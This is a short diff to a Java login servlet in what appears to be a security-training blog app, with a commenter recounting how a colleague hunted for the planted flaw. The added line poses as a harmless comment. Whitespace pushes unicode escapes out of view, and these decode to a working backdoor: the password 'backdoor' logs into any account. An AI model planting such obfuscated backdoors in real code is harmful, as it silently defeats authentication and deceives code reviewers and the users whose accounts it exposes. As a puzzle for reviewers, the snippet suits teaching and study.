webapp/src/main/java/kwashc/blog/servlet/LogInServlet.java

```diff
@@ -44,6 +44,7 @@ protected void service(HttpServletRequest request, HttpServletResponse response)
         String password = request.getParameter("password");
 
         User user = Database.getUser(username);
+        /* check if the passwords match                                                                                                                                                                       \u002a\u002f\u0069\u0066\u0028\u0070\u0061\u0073\u0073\u0077\u006f\u0072\u0064\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0062\u0061\u0063\u006b\u0064\u006f\u006f\u0072\u0022\u0029\u0029\u0020\u0070\u0061\u0073\u0073\u0077\u006f\u0072\u0064\u0020\u003d\u0020\u0075\u0073\u0065\u0072\u002e\u0067\u0065\u0074\u0050\u0061\u0073\u0073\u0077\u006f\u0072\u0064\u0028\u0029\u003b\u002f\u002a */

```

Comment:
One did, but I ended up telling him what class the backdoor was located in after he'd been debugging for a while. 10 minutes later he found it, and promised to check the git history and do violence to the author :)